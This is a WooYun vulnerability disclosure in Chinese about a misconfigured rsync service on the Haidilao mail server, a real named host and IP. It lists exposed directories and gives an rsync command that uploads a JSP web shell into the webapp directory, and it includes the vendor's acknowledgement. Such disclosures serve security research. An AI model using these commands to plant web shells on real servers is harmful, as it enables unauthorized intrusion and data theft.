当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041227

漏洞标题:海底捞邮件系统配置不当可shell

相关厂商:haidilao.com

漏洞作者: ifelse

提交时间:2013-10-28 11:57

修复时间:2013-12-12 11:57

公开时间:2013-12-12 11:57

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-28: 细节已通知厂商并且等待厂商处理中
2013-10-28: 厂商已经确认,细节仅向厂商公开
2013-11-07: 细节向核心白帽子及相关领域专家公开
2013-11-17: 细节向普通白帽子公开
2013-11-27: 细节向实习白帽子公开
2013-12-12: 细节向公众公开

简要描述:

由于配置不当,可导致直接获得shell

详细说明:

124.127.49.65 mail.haidilao.com

root@bt:~# rsync mail.haidilao.com::
data
mysql
coremail
root@bt:~# rsync mail.haidilao.com::data
drwx------ 4096 2013/10/25 03:50:09 .
-rwx------ 4 2013/10/25 11:55:26 cm_seed.data
drwx------ 4096 2012/11/29 15:53:05 00
drwx------ 4096 2012/11/29 16:40:27 batch
drwx------ 4096 2012/11/29 16:40:27 cleanup
drwx------ 4096 2012/11/29 16:40:28 lost+found
drwx------ 4096 2013/07/19 06:45:29 mysql
drwx------ 4096 2012/11/29 16:55:58 netfolder
drwxr-xr-x 4096 2013/10/25 03:57:18 newdisk
drwx------ 4096 2012/11/29 16:55:58 search
drwx------ 4096 2012/11/29 17:20:31 ud
root@bt:~# rsync mail.haidilao.com::coremail
drwx------ 4096 2013/02/22 22:32:05 .
-rw------- 212 2012/06/27 03:55:37 .bash_history
-rw-r--r-- 33 2011/08/29 04:22:35 .bash_logout
-rw-r--r-- 176 2011/08/29 04:22:35 .bash_profile
-rw-r--r-- 124 2011/08/29 04:22:35 .bashrc
-rw-r--r-- 515 2011/08/29 04:22:35 .emacs
lrwxrwxrwx 26 2012/11/18 22:47:57 .my.cnf
-rw------- 568 2012/06/27 01:44:22 .viminfo
-rw-r--r-- 658 2011/08/29 04:22:35 .zshrc
-rw-r--r-- 46939 2012/10/19 03:33:44 1.txt
-rw-r--r-- 5561643 2011/05/13 05:28:00 cm4.0.0_api_adv_RHEL4_x86_32.tar.gz
-rw-r--r-- 143825549 2011/05/19 14:45:49 cm4.0.0_clamav_RHEL4_x86_32.tar.gz
-rw-r--r-- 13747946 2012/11/08 22:14:41 lib.tgz
drwxr-xr-x 4096 2011/08/29 04:22:35 .mozilla
drwxr-xr-x 4096 2013/03/01 02:33:41 bin
drwxr-xr-x 4096 2013/10/15 02:15:16 conf
drwxr-xr-x 4096 2013/07/19 06:46:04 gateway
drwxr-xr-x 4096 2012/11/12 21:25:15 install
drwxr-xr-x 4096 2012/11/27 13:59:23 java
drwxr-xr-x 4096 2012/11/21 22:18:24 lib
drwxr-xr-x 4096 2013/01/01 02:12:07 libexec.0101
drwxr-xr-x 4096 2013/01/01 02:12:07 libexec
drwxr-xr-x 28672 2013/10/27 10:55:00 logs
drwxr-xr-x 4096 2012/05/21 07:12:56 mysql
drwxr-xr-x 4096 2011/08/29 12:08:12 sbin
drwxr-xr-x 4096 2012/11/28 06:53:11 tsc
drwxr-xr-x 4096 2013/10/27 10:45:26 var
drwxr-xr-x 4096 2011/08/29 04:24:10 web

漏洞证明:

上传shell
rsync /root/shell.jsp mail.haidilao.com::coremail/web/webapp/

shell.jpg

修复方案:

http://drops.wooyun.org/papers/161

版权声明:转载请注明来源 ifelse@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-10-28 12:35

厂商回复:

您好,感谢您提报的漏洞细节,我们已经通知工程师修复该漏洞;

最新状态:

暂无